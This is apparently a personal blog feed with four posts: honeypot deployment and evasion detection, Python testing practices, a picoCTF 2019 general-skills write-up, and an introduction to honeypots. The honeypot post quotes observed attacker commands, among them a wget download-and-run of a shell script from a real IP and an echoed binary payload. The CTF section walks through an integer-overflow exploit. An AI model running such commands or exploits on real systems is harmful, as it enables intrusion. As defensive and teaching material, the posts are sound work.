Furthermore, it is strongly advised to run Honeypot services as a non-root user that has minimal permissions and is not able to use sudo. In the case of Honeypot escapes this makes it considerably harder for attackers to escalate privileges. As most emulated services are running in the range of system ports which require elevated privileges, it is prudent to run them on non-system ports and utilize iptables forwarding rules to make them look like they are running on the system port.<br />
If Honeypots for common services like SSH and FTP are deployed, they should be running on the services’ default port. Especially for SSH as means of access for most systems, it is recommended to disable password authentication and root login for the real SSH server, as well as running it on a non-standard port to free up port 22 for the Honeypot. This also means that the creation of an SSH alias in local configs is recommended to avoid connecting to the SSH Honeypot by accident when conducting maintenance or applying configuration changes.<br />
Another consideration is the hosting service for the infrastructure. If it is not hosted on company-owned infrastructure, the idea of using a low-end VPS provider is compelling. Unfortunately, these are prone to being shut down in the context of <a href="https://tech.slashdot.org/story/19/12/08/1549222/20-low-end-vps-providers-suddenly-shutting-down-in-a-deadpooling-scam">deadpooling scams</a>, so it pays to be prepared to lose these systems at any time. In general, automated deployments based on tools like Ansible or Puppet should be used for reproducible results and to lower the risk of misconfigurations. Combined with a backup strategy for collected data, logs, and payloads, this ensures resilience to data loss.<br />
Furthermore, it is recommended to minimize the usage of OS-based resources for the specific requirements of Honeypots. For example, the usage of local virtual environments for Python-based projects should be considered over using system-wide package installations to avoid dependency problems with multiple projects running on the same language or OS updates that break dependencies.<br />
Regarding operation, it is also advisable to monitor the regular operation of deployed Honeypots including storage utilization, ideally with automated tests tailored to the respective protocol.<br />
Generally speaking, you’re exposing a system to the world that looks vulnerable - it most likely is vulnerable, but in other ways than you’d think. Honeypot deployments, especially when internet-facing, are an asymmetrical playing field with an attacker advantage: attackers have unlimited ways and time to try attacks – the operator only needs to make one mistake to expose the Honeypot host and possibly the surrounding network.<br />
Besides the deployment, there are more things to take into consideration. Attackers constantly try to detect Honeypots – with various techniques and varying success rates. A <a href="https://media.ccc.de/v/32c3-7277-breaking_honeypots_for_fun_and_profit">talk detailing finding flaws and their implications was held at 32c3</a>. In the upcoming section, some commonly encountered detection techniques and possible workarounds are presented. These are merely pointers in the right direction. It is advisable to monitor your Honeypot infrastructure constantly and keep an eye out for disconnects always happening after specific commands or workflows, as these can point to evasion strategies.</p>
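<p>The constant monitoring recommended above can start with something as simple as a banner grab. The following is a minimal sketch, assuming the honeypot emulates SSH; the host name is a placeholder, not real infrastructure:</p>

```python
import socket


def ssh_banner(host: str, port: int = 22, timeout: float = 5.0) -> str:
    """Fetch the first line a server sends - for SSH, its version banner."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        return sock.recv(256).decode(errors="replace").strip()


def honeypot_alive(host: str, port: int = 22) -> bool:
    # A healthy SSH honeypot should greet us like a real sshd would.
    try:
        return ssh_banner(host, port).startswith("SSH-2.0-")
    except OSError:
        return False


# e.g. run from cron: honeypot_alive("honeypot.example.com") -> alert on False
```

<p>Scheduled together with a disk-usage check, such a probe covers the basic operational monitoring of both service and storage.</p>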
<h2 id="custom-configurations">Custom Configurations</h2>
<p>Many Honeypots come with a default set of emulated parameters – including Hostname, service version, and credentials. This is especially common in low and medium interaction Honeypots. In the context of Honeypot configurations, customization is the key to evasion mitigation.<br />
Consider the SSH Honeypot <em>Cowrie</em> as an example. In its unchanged default configuration, it used to accept the user <code class="language-plaintext highlighter-rouge">Richard</code> with the password <code class="language-plaintext highlighter-rouge">fout</code>, afterwards announcing its system name as <code class="language-plaintext highlighter-rouge">svr04</code>. Checking for default configurations like these is easy and therefore happens a lot.<br />
As a preventive measure, the footprint of the Honeypot should be as custom as possible. Especially announced hostnames, service versions and banners are low hanging fruit that can be changed. For low and medium interaction Honeypots it can also be a valid strategy to change outputs of emulated commands and create custom filesystem pickles to further make the system unique.</p>
<h2 id="finding-evasion-tactics">Finding evasion tactics</h2>
<p>As a general recommendation, monitor your Honeypots closely, especially in the early days of deployment, as they are “fresh” and unknown at this point. To stay on the example of Cowrie, it is possible to spot evasion techniques quite easily in the generated logs. In all cases the command workflow on the system is the same up until a specific point where commands either fail or are not executed at all. A commonly observed pattern of actors on the Cowrie SSH Honeypot is to echo the raw payload into a file and then try to execute it.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>user@pot:~<span class="nv">$ </span>/bin/busybox <span class="nb">echo</span> <span class="nt">-en</span> <span class="s1">'\x00\x00\x00\x00\xb4\x03\x00\x00\x1e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00'</span> <span class="o">>></span> retrieve
user@pot:~<span class="nv">$ </span>./retrieve
</code></pre></div></div>
<p>This does not work on most low and medium interaction Honeypots, as they discard files created by the connected SSH user as soon as possible. As the file no longer exists, the workflow of echoing the initial payload into a file and executing it afterwards fails on these Honeypots; it can therefore be used as a successful evasion check.
Another evasion technique commonly encountered is to download the payload and execute it in a second command. As discussed, this approach leads to a successful evasion, as the file is not available to the user anymore at time of execution.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>user@pot:~<span class="nv">$ </span><span class="nb">cd</span> /<span class="p">;</span> wget http://45.148.10.175/bins.sh<span class="p">;</span> <span class="nb">chmod </span>777 bins.sh<span class="p">;</span> sh bins.sh<span class="p">;</span>
</code></pre></div></div>
<p>There are not many mitigations available to these issues. Due to the very nature of low and medium interaction Honeypots, the most viable mitigation is to switch to a high interaction system. High interaction Honeypots present a complete, persistent environment to an incoming connection that often is cached even through reconnects. This means that all dropped or downloaded payloads are available for execution instead of being snatched away by the Honeypot.</p>
<h2 id="sanity-checks">Sanity Checks</h2>
<p>Sanity checks are also encountered quite often. As an initial example, consider an SMTP Honeypot. Attackers connect to the mail server and send a test mail to their own infrastructure to check whether it allows outbound mail traffic.</p>
<div class="language-json highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">{</span><span class="w">
</span><span class="nl">"timestamp"</span><span class="p">:</span><span class="w"> </span><span class="s2">"2020-06-14T08:57:00.854855"</span><span class="p">,</span><span class="w">
</span><span class="nl">"src_ip"</span><span class="p">:</span><span class="w"> </span><span class="s2">"0.0.0.0"</span><span class="p">,</span><span class="w"> </span><span class="nl">"src_port"</span><span class="p">:</span><span class="w"> </span><span class="mi">54282</span><span class="p">,</span><span class="w"> </span><span class="nl">"eventid"</span><span class="p">:</span><span class="w"> </span><span class="s2">"mailhon.data"</span><span class="p">,</span><span class="w">
</span><span class="nl">"envelope_from"</span><span class="p">:</span><span class="w"> </span><span class="s2">"[email protected]"</span><span class="p">,</span><span class="w"> </span><span class="nl">"envelope_to"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="s2">"[email protected] "</span><span class="p">],</span><span class="w">
</span><span class="nl">"envelope_data"</span><span class="p">:</span><span class="w"> </span><span class="s2">"From: [email protected]</span><span class="se">\r\n</span><span class="s2">Subject: 42.42.42.42</span><span class="se">\r\n</span><span class="s2">
To: [email protected]</span><span class="se">\r\n</span><span class="s2">Date: Sat, 13 Jun 2020 23:56:59 -0700</span><span class="se">\r\n</span><span class="s2">X-Priority: 3</span><span class="se">\r\n</span><span class="s2">"</span><span class="w">
</span><span class="p">}</span><span class="w">
</span></code></pre></div></div>
<p>A possible mitigation is to allow the first mail from every connection to leave the honeypot. Be advised that this bears legal implications as the system is technically sending out spam.<br />
Besides the fully-fledged production test, there are other sanity checks that can be observed. As a general guideline, deployed Honeypots should expose a configuration and sizing similar to their real-world counterparts. This can be achieved more easily on low and medium interaction HPs, as they often emulate commands by looking up text files, which massively eases the spoofing of cluster states, replica configurations or even filesystem sizes.</p>
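<p>The “let the first mail out” mitigation boils down to per-source bookkeeping. A hedged sketch, keyed on the source IP for simplicity - and the legal caveat about relaying spam applies just as much here:</p>

```python
from collections import defaultdict

# How many mails each source has tried to send through us so far.
_mails_seen = defaultdict(int)


def should_relay(src_ip: str) -> bool:
    """Relay only the very first mail from each source, swallow the rest."""
    _mails_seen[src_ip] += 1
    return _mails_seen[src_ip] == 1
```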
<h2 id="conclusion">Conclusion</h2>
<p>As one can see, there is a lot to consider and check when deploying Honeypots. But don’t fret - the work definitely pays off. It is fascinating to watch in real time what is happening on your systems. But looking at logs isn’t that much fun, so join me in the next part for details on sighting and visualizing data!</p>
<p>Continue reading about visualizing all this data in <a href="/2021/03/05/honeypot-viz">Part 3</a>!</p>Deploying Honeypots right is not always straightforward and leaves plenty of room for mistakes. Join me for a while to learn about deployment and customization of Honeypots.My Python Testing Best Practices2020-08-31T15:00:00+00:002020-08-31T15:00:00+00:00https://maddosaurus.github.io/2020/08/31/my-pytest-best-practices<p>As someone who has been using Python professionally in the younger past, I found some best practices regarding testing and project setup that work well for me. Today I’d like to share them with you.</p>
<!--more-->
<p><strong>TL;DR</strong>: The repo containing demo code: <a href="https://github.com/Maddosaurus/pytest-practice">Maddosaurus/pytest-practice</a>.</p>
<h2 id="project-setup">Project Setup</h2>
<p>The project setup is based on Kenneth Reitz’ <a href="https://docs.python-guide.org/">Hitchhiker’s Guide To Python</a>. It follows the idea of a separate module accompanied by tests and supporting info on the same level (i.e. not contained in the module itself). This keeps the module lean and small.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># Module containing the code</span>
pytdemo/pytdemo.py
pytdemo/util.py
<span class="c"># Testsuite</span>
tests/conftest.py
tests/test_pytdemo.py
tests/test_util.py
<span class="c"># Supporting information</span>
.gitignore
LICENSE
README.md
requirements.txt
setup.py
</code></pre></div></div>
<p>As one can see, the module itself only contains the bare essentials. The test suite is organized to roughly match the submodules, but this is an idea I only use for smaller modules. If submodules get larger and more complex, I tend to group tests by behaviour or logical groups.</p>
<h2 id="test-setup">Test Setup</h2>
<p>Personally, I’m using a wild mixture of <a href="https://docs.pytest.org/en/stable/">pytest</a>, <a href="https://docs.python.org/3/library/unittest.mock.html#unittest.mock.MagicMock">unittest.mock.MagicMock</a> and <a href="https://requests-mock.readthedocs.io/en/latest/">requests-mock</a> - the last one only if the module is using <code class="language-plaintext highlighter-rouge">requests</code> directly to interact with REST APIs.<br />
As a general recommendation, you should monitor your test coverage. To do that, I like to use <a href="https://pytest-cov.readthedocs.io/en/latest/readme.html">pytest-cov</a>, which is a powerful tool that can generate nice reports with the <code class="language-plaintext highlighter-rouge">--cov-report html</code> option.<br />
A word of caution: Aiming for 100% coverage is a great thing to do, but don’t try to enforce it. This can end up being extremely tedious and sometimes impossible. Try to find smart goals instead, e.g. agreeing on covering all functionally important parts of your project.</p>
<h3 id="the-conftest-file">The conftest File</h3>
<p>You might have noticed that there is a <code class="language-plaintext highlighter-rouge">conftest.py</code> living in the <code class="language-plaintext highlighter-rouge">tests</code> folder. This file is used to store shared <a href="https://docs.pytest.org/en/stable/fixture.html">pytest fixtures</a> that can be used in all test files. This is highly recommended, especially for helper functions and data sources.<br />
In the example code, you will find a fixture that creates a custom instance of the main module with a URL pointing to localhost. This ensures that even if your mocked endpoints don’t catch every call, you’ll be the first to know (and we also avoid hitting the real service with test requests).</p>
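<p>In the spirit of that description, a minimal <code class="language-plaintext highlighter-rouge">conftest.py</code> could look like the sketch below - <code class="language-plaintext highlighter-rouge">CrtSh</code> and its <code class="language-plaintext highlighter-rouge">base_url</code> parameter are stand-ins for the demo module’s real class:</p>

```python
import pytest


class CrtSh:
    """Stand-in for the real module class under test."""

    def __init__(self, base_url: str):
        self.base_url = base_url


@pytest.fixture
def crt_mock():
    # Point at localhost so any call that slips past the mocks fails fast
    # instead of hitting the real service.
    return CrtSh(base_url="http://localhost:9999/")
```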
<h2 id="patching-monkeys">Patching Monkeys</h2>
<p>There is one core concern when writing tests: you want each test to be as small and as free of side effects as possible. This can be achieved by mocking away all calls to other functions that the subject under test (SUT) makes. Pytest provides multiple mechanisms for this, with <a href="https://docs.pytest.org/en/stable/monkeypatch.html"><code class="language-plaintext highlighter-rouge">monkeypatch</code></a> being my favourite for its balance between readability and explicitness.<br />
As an example:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">test_get_all_URL</span><span class="p">(</span><span class="n">crt_mock</span><span class="p">,</span> <span class="n">monkeypatch</span><span class="p">):</span>
<span class="c1"># Set up a mock that will replace the requests module in CrtSh and use it
</span> <span class="c1"># The MagicMock class comes in handy as it does a lot in the background for us.
</span> <span class="n">requests_mock</span> <span class="o">=</span> <span class="n">MagicMock</span><span class="p">()</span>
<span class="n">monkeypatch</span><span class="p">.</span><span class="nb">setattr</span><span class="p">(</span><span class="n">pytdemo</span><span class="p">.</span><span class="n">requests</span><span class="p">,</span> <span class="s">"get"</span><span class="p">,</span> <span class="n">requests_mock</span><span class="p">)</span>
<span class="n">crt_mock</span><span class="p">.</span><span class="n">get_all</span><span class="p">(</span><span class="s">"testhost.domain"</span><span class="p">)</span>
<span class="c1"># Check it the requests module was called with the correct URL
</span> <span class="n">requests_mock</span><span class="p">.</span><span class="n">assert_called_once_with</span><span class="p">(</span>
<span class="s">"https://test.local/"</span><span class="p">,</span>
<span class="n">params</span><span class="o">=</span><span class="p">{</span><span class="s">"Identity"</span><span class="p">:</span> <span class="s">"testhost.domain"</span><span class="p">,</span> <span class="s">"output"</span><span class="p">:</span> <span class="s">"json"</span><span class="p">}</span>
<span class="p">)</span>
</code></pre></div></div>
<p>In the example the <em>get</em> function of <code class="language-plaintext highlighter-rouge">requests</code> is replaced with a custom <code class="language-plaintext highlighter-rouge">MagicMock</code> object which will save every call to it.<br />
As you can see, the test is divided into three parts:</p>
<ol>
<li>Arrange - Set up all required vars, data and mocks</li>
<li>Act - Call the SUT</li>
<li>Assert - Checking the result for correctness</li>
</ol>
<p>This threefold structure improves readability - conventions often help to make your job as a team easier. It is actually a well known pattern called <a href="https://freecontent.manning.com/making-better-unit-tests-part-1-the-aaa-pattern/">AAA - Arrange, Act, Assert</a> and I recommend reading a bit more about it if you’re interested in writing better Unit Tests.</p>
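<p>Stripped of all mocking, the AAA pattern is just three labeled steps (the cart example is mine, invented for illustration):</p>

```python
def test_shopping_cart_total():
    # Arrange - set up the data the SUT needs
    prices = [3, 4, 5]
    # Act - call the subject under test
    total = sum(prices)
    # Assert - check the result for correctness
    assert total == 12
```

<p>Keeping the three blocks visually separated, even in tests this small, makes it obvious at a glance what is setup, what is the call, and what is the expectation.</p>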
<p>As you can see, combining different Python tools for testing can yield a very powerful setup that lets you build your tests quickly and easily.</p>
<h2 id="final-thoughts">Final Thoughts</h2>
<p>I’m merely scratching the surface with this post. There are many more modules and best practices I’d like to share over time that ease your life as a Python dev.<br />
For now, keep in mind that testing might feel like it is slowing you down, but it in fact ensures that you keep your current speed. Writing good Unit Tests ensures that all the parts in your module work as intended and keep working as intended - even when you’re changing and refactoring the code. This also means that you should run your tests often, so please make sure that they execute as fast as possible.<br />
Finally, maybe the most important tests you’ll write are the ones that are created in the context of a bug ticket:<br />
Try reproducing the bug with a Unit Test first before attempting to fix it. With this order of operations you ensure that the bug is fixed and that it won’t come back at a later stage, so get testing!</p>As someone who has been using Python professionally in the younger past, I found some best practices regarding testing and project setup that work well for me. Today I’d like to share them with you.picoCTF 2019 - General Skills2020-06-28T22:00:00+00:002020-06-28T22:00:00+00:00https://maddosaurus.github.io/2020/06/28/picoCTF-general<p>The picoCTF 2019 contained multiple challenges in the “General” category. As most of these were rather short, they are documented in a collective post rather than single ones.</p>
<!--more-->
<p>Name: Let’s Warm Up<br />
Points: 50<br />
Challenge: If I told you a word started with 0x70 in hexadecimal, what would it start with in ASCII?<br />
Solution: A quick lookup in a <a href="http://www.asciitable.com/">table</a> yields “p”, so the answer would be <code class="language-plaintext highlighter-rouge">picoCTF{p}</code>.</p>
<hr />
<p>Name: Warmed Up<br />
Points: 50<br />
Challenge: What is 0x3D (base 16) in decimal (base 10)?<br />
Solution: For example, open the Windows Calculator (calc.exe), set it to “Programmer”, select HEX, then enter 3D.</p>
<hr />
<p>Name: 2Warm<br />
Points: 50<br />
Challenge: Can you convert the number 42 (base 10) to binary (base 2)?<br />
Solution: Same as “Warmed Up”, using calc in Programmer by selecting DEC, entering 42 and reading solution from BIN.</p>
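<p>All three warm-up conversions can also be done in one line each with Python built-ins, without reaching for calc.exe:</p>

```python
# Let's Warm Up: 0x70 as an ASCII character
assert chr(0x70) == "p"
# Warmed Up: 0x3D (base 16) in decimal (base 10)
assert int("3D", 16) == 61
# 2Warm: 42 (base 10) in binary (base 2)
assert format(42, "b") == "101010"
```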
<hr />
<p>Name: Bases<br />
Points: 100<br />
Challenge: What does this bDNhcm5fdGgzX3IwcDM1 mean? I think it has something to do with bases.<br />
Solution: By educated guessing, it looks like a base64-encoded string. On Linux, this can be decoded using <code class="language-plaintext highlighter-rouge">echo "bDNhcm5fdGgzX3IwcDM1" | base64 -d</code>, which yields the flag.</p>
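<p>The same decode works with the Python standard library, handy on systems without the base64 CLI:</p>

```python
import base64

# Decode the challenge string and wrap the result in picoCTF{} for the flag.
decoded = base64.b64decode("bDNhcm5fdGgzX3IwcDM1").decode()
print(decoded)  # l3arn_th3_r0p35
```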
<hr />
<p>Name: First Grep<br />
Points: 100<br />
Challenge: Can you find the flag in <a href="https://2019shell1.picoctf.com/static/c36821c1ffbd5ed01f10ba2ed05ab413/file">file</a>? This would be really tedious to look through manually, something tells me there is a better way. You can also find the file in /problems/first-grep_6_c2319e8af66fa6bec197edc733dd52dd on the shell server.<br />
Solution: As the challenge name hints, grep helps in solving this challenge. Executing <code class="language-plaintext highlighter-rouge">cat file | grep picoCTF</code> yields the flag.</p>
<hr />
<p>Name: Resources<br />
Points: 100<br />
Challenge: We put together a bunch of resources to help you out on our website! If you go over there, you might even find a flag! https://picoctf.com/resources (<a href="https://picoctf.com/resources">link</a>)<br />
Solution: Open the link and read the page. The flag can be found in the text.</p>
<hr />
<p>Name: strings it<br />
Points: 100<br />
Challenge: Can you find the flag in <a href="https://2019shell1.picoctf.com/static/7963880d17a07ff2009afa1687fda1cc/strings">file</a> without running it? You can also find the file in /problems/strings-it_5_1fd17da9526a76a4fffce289dee10fbb on the shell server.<br />
Solution: As the challenge name implies, the use of the Linux command “strings” helps in solving this challenge. <code class="language-plaintext highlighter-rouge">strings strings | grep picoCTF</code></p>
<hr />
<p>Name: what’s a net cat?<br />
Points: 100<br />
Challenge: Using netcat (nc) is going to be pretty important. Can you connect to 2019shell1.picoctf.com at port 4158 to get the flag?<br />
Solution: Calling netcat with the given parameters yields the flag: <code class="language-plaintext highlighter-rouge">nc 2019shell1.picoctf.com 4158</code></p>
<hr />
<p>Name: Based<br />
Points: 200<br />
Challenge: To get truly 1337, you must understand different data encodings, such as hexadecimal or binary. Can you get the flag from this program to prove you are on the way to becoming 1337? Connect with nc 2019shell1.picoctf.com 44303.<br />
Solution:<br />
When connecting, you are greeted with a series of prompts asking you to transcode multiple formats into ASCII.<br />
It starts with binary, followed by octal and then hex without spacers:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Let us see how data is stored
chair
Please give the 01100011 01101000 01100001 01101001 01110010 as a word.
...
you have 45 seconds.....
Input:
chair
Please give me the 154 151 147 150 164 as a word.
Input:
light
Please give me the 706965 as a word.
Input:
pie
You've beaten the challenge
Flag: ...
</code></pre></div></div>
<p>Interestingly enough, the words change on every reconnect, so simply memorizing the answers won’t work.
This is best done with an ASCII table at hand (e.g. http://www.asciitable.com/).</p>
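<p>Alternatively, given the 45-second limit, the conversions can be scripted with Python built-ins; the helpers below reproduce the transcript’s examples:</p>

```python
def from_binary(s: str) -> str:
    """Space-separated binary bytes -> ASCII string."""
    return "".join(chr(int(b, 2)) for b in s.split())


def from_octal(s: str) -> str:
    """Space-separated octal bytes -> ASCII string."""
    return "".join(chr(int(o, 8)) for o in s.split())


def from_hex(s: str) -> str:
    """Hex string without spacers -> ASCII string."""
    return bytes.fromhex(s).decode()


assert from_binary("01100011 01101000 01100001 01101001 01110010") == "chair"
assert from_octal("154 151 147 150 164") == "light"
assert from_hex("706965") == "pie"
```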
<hr />
<p>Name: First Grep: Part II<br />
Points: 200<br />
Challenge: Can you find the flag in /problems/first-grep–part-ii_4_ca16fbcd16c92f0cb1e376a6c188d58f/files on the shell server? Remember to use grep.<br />
Solution:<br />
This challenge needs you to log in to the webshell. Once there, one can cd to the directory and do a recursive grep on all files:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>cd /problems/first-grep--part-ii_4_ca16fbcd16c92f0cb1e376a6c188d58f/files
grep -iR picoCTF* .
</code></pre></div></div>
<p>which yields the flag.</p>
<hr />
<p>Name: plumbing<br />
Points: 200<br />
Challenge: Sometimes you need to handle process data outside of a file. Can you find a way to keep the output from this program and search for the flag? Connect to 2019shell1.picoctf.com 21957.<br />
Solution:
On connect, the console is spammed with a lot of output. As the challenge name hints, one can redirect the output into a file and then grep that file.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nc 2019shell1.picoctf.com 21957 > out.txt
cat out.txt | grep picoCTF
</code></pre></div></div>
<p>which yields the flag.</p>
<hr />
<p>Name: whats-the-difference<br />
Points: 200<br />
Challenge: Can you spot the difference? <a href="https://2019shell1.picoctf.com/static/473cf765877f28edf95140f90cd76b59/kitters.jpg">kitters</a> <a href="https://2019shell1.picoctf.com/static/473cf765877f28edf95140f90cd76b59/cattos.jpg">cattos</a> They are also available at /problems/whats-the-difference_0_00862749a2aeb45993f36cc9cf98a47a on the shell server<br />
Solution: The pictures differ at multiple places by one byte. By comparing them byte by byte and printing the differing bytes from cattos.jpg, we get the flag. <code class="language-plaintext highlighter-rouge">cmp -bl cattos.jpg kitters.jpg | awk '{print $3}' | tr -d "\n"</code></p>
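<p>The idea behind the cmp/awk pipeline - emit every byte of one file where the two differ - fits in a few lines of Python, demonstrated here on toy byte strings instead of the actual challenge images:</p>

```python
def hidden_bytes(original: bytes, modified: bytes) -> str:
    """Collect each byte of `modified` that differs from `original`."""
    return "".join(chr(m) for o, m in zip(original, modified) if o != m)


# Toy stand-ins for kitters.jpg / cattos.jpg:
kitters = b"hello world"
cattos = b"heXlo wYrld"
assert hidden_bytes(kitters, cattos) == "XY"
```

<p>Run over the real images, the differing bytes concatenate into the flag.</p>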
<hr />
<p>Name: where-is-the-file<br />
Points: 200<br />
Challenge: I’ve used a super secret mind trick to hide this file. Maybe something lies in /problems/where-is-the-file_2_f1aa319cafd4b55ee4a60c1ba65255e2.<br />
Solution:<br />
The file in question is a “hidden” file whose name begins with a dot (.). To list these, the ls command needs the -a parameter:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>cd /problems/where-is-the-file_2_f1aa319cafd4b55ee4a60c1ba65255e2
ls -lah
cat .cant_see_mee
</code></pre></div></div>
<hr />
<p>Name: flag_shop<br />
Points: 300<br />
Challenge: There’s a flag shop selling stuff, can you buy a flag? <a href="https://2019shell1.picoctf.com/static/23b8f90691073c4466b11fe2bae8d6ae/store.c">Source</a>. Connect with nc 2019shell1.picoctf.com 29250.<br />
Solution: Upon connection, a text-based menu is presented to the user. There is not enough money in the account to buy the “real” flag.<br />
Upon inspection of the source code, it becomes apparent that <code class="language-plaintext highlighter-rouge">total_cost</code> is stored as a signed integer and can be overflowed by buying a very large number of flags:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">if</span><span class="p">(</span><span class="n">number_flags</span> <span class="o">></span> <span class="mi">0</span><span class="p">){</span>
<span class="kt">int</span> <span class="n">total_cost</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">total_cost</span> <span class="o">=</span> <span class="mi">900</span><span class="o">*</span><span class="n">number_flags</span><span class="p">;</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"</span><span class="se">\n</span><span class="s">The final cost is: %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">total_cost</span><span class="p">);</span>
<span class="k">if</span><span class="p">(</span><span class="n">total_cost</span> <span class="o"><=</span> <span class="n">account_balance</span><span class="p">){</span>
<span class="n">account_balance</span> <span class="o">=</span> <span class="n">account_balance</span> <span class="o">-</span> <span class="n">total_cost</span><span class="p">;</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"</span><span class="se">\n</span><span class="s">Your current balance after transaction: %d</span><span class="se">\n\n</span><span class="s">"</span><span class="p">,</span> <span class="n">account_balance</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>
<p>With a sufficiently large quantity, the cost turns negative, effectively adding money to the user’s account:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Welcome to the flag exchange
We sell flags
(...)
Enter a menu selection
2
Currently for sale
1. Defintely not the flag Flag
2. 1337 Flag
1
These knockoff Flags cost 900 each, enter desired quantity
3579138
The final cost is: -1073743096
Your current balance after transaction: 1073744196
Welcome to the flag exchange
We sell flags
(...)
Enter a menu selection
2
Currently for sale
1. Defintely not the flag Flag
2. 1337 Flag
2
1337 flags cost 100000 dollars, and we only have 1 in stock
Enter 1 to buy one1
YOUR FLAG IS:
</code></pre></div></div>
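<p>The wraparound in the transcript can be reproduced by emulating C’s 32-bit signed arithmetic (in practice, the value wraps in two’s complement). The helper below is a generic sketch, and the starting balance of 1100 is inferred from the transcript:</p>

```python
def c_int32(n: int) -> int:
    # Wrap an arbitrary Python int into a signed 32-bit value,
    # as a C `int` does in practice on overflow (two's complement).
    n &= 0xFFFFFFFF
    return n - 0x100000000 if n >= 0x80000000 else n

flags = 3579138                    # quantity entered in the transcript
total_cost = c_int32(900 * flags)  # the multiplication from store.c
balance = 1100 - total_cost        # the subtraction turns into an addition
```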
<hr />
<p>Name: mus1c<br />
Points: 300<br />
Challenge: I wrote you a <a href="https://2019shell1.picoctf.com/static/e0b32d09ed9e6cf0d4a7ded906a29e21/lyrics.txt">song</a>. Put it in the picoCTF{} flag format<br />
Solution: On closer inspection, the lyrics turn out to be a valid program in a language called <a href="https://codewithrockstar.com/online">rockstar</a>. Run in the rockstar online sandbox, they produce output:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>114
114
114
111
99
107
110
(...)
</code></pre></div></div>
<p>This output can then be translated into the flag (decimal to character).</p>
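<p>The decimal-to-character translation is a one-liner; the sample values below are the first numbers of the output above:</p>

```python
def decode(values):
    # Interpret each decimal number as an ASCII code point.
    return "".join(chr(v) for v in values)
```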
<hr />
<p>Name: 1_wanna_b3_a_r0ck5tar<br />
Points:<br />
Challenge: I wrote you another <a href="https://2019shell1.picoctf.com/static/c7fa1eda3444e700dfd8addb3cf8e806/lyrics.txt">song</a>. Put the flag in the picoCTF{} flag format.<br />
Solution: This is again a valid rockstar program. This time it requires input. The easiest way is to patch it, removing all input statements and the parts that rely on them:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Rocknroll is right
Silence is wrong
A guitar is a six-string
Tommy's been down
Music is a billboard-burning razzmatazz!
Tommy is rockin guitar
Shout Tommy!
Music is amazing sensation
Jamming is awesome presence
Scream Music!
Scream Jamming!
Tommy is playing rock
Scream Tommy!
They are dazzled audiences
Shout it!
Rock is electric heaven
Scream it!
Tommy is jukebox god
Say it!
Break it down
Shout "Bring on the rock!"
</code></pre></div></div>
<p>which yields the desired output:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>66
79
(...)
</code></pre></div></div>The picoCTF 2019 contained multiple challenges in the “General” category. As most of these were rather short, they are documented in a collective post rather than single ones.What are Honeypots and why do I want them?2020-06-19T09:00:00+00:002020-06-19T09:00:00+00:00https://maddosaurus.github.io/2020/06/19/honeypot-intro<p>Honeypots can provide valuable insights into the threat landscape, both in the open internet as well as your internal network. Deploying them right is not always straightforward, just like interpreting any activity on them.</p>
<!--more-->
<p>This is part 1 of a series detailing visualization, automation, deployment considerations, and pitfalls of Honeypots.<br />
An extended version of this article and an accompanying talk can be found at <a href="https://vblocalhost.com/conference/presentations/like-bees-to-a-honeypot-a-journey-through-honeypots/">Virus Bulletin 2020</a>.</p>
<p>As attacks on internet-facing infrastructure have become mostly automated in recent years, Honeypots lost some of their value for detecting novel exploits and attacks on said infrastructure. Combined with the fact that people running Honeypots usually don’t want to give away details on how they customized them to keep them from being detected, this leads to a situation where the value of running them is easily underestimated. Although the attackers’ mode of operation has changed, Honeypots still allow valuable insights into ongoing campaigns, the credentials being used, and the payloads being distributed.</p>
<p>To understand what value Honeypots bring to the table, it is imperative to know what they are used for.<br />
Basically, Honeypots mimic systems that look vulnerable and are therefore valuable targets for attacks. This can either be a vulnerable-looking service (e.g. SSH, Elastic) or a client (e.g. a browser).<br />
The latter emulates a browser to find websites that, for example, try to execute malicious payloads on clients, like JavaScript cryptominers or drive-by downloads.
The former emulates a complete server or protocol to find the tools, techniques and procedures used by malicious actors. Such Honeypots can be used to uncover, for example, attacks tailored to take over publicly accessible IoT devices or to ransom unsecured MongoDB instances.<br />
Server-side Honeypots can further be grouped into three categories based on the level of emulation they provide: Low, Medium and High Interaction Honeypots.
Low interaction Honeypots are rather easy to build, as they often emulate only the basic commands of a protocol. For SSH, a low interaction HP can consist only of the login dialog to collect usernames and passwords potentially used in credential stuffing attacks.<br />
Medium interaction Honeypots take this principle a step further and emulate more commands and part of the surrounding system. As an example, the medium interaction HP <a href="https://github.com/cowrie/cowrie">Cowrie</a> emulates a complete filesystem as well as many integrated system commands like lsof or netstat to look like a fully running system.<br />
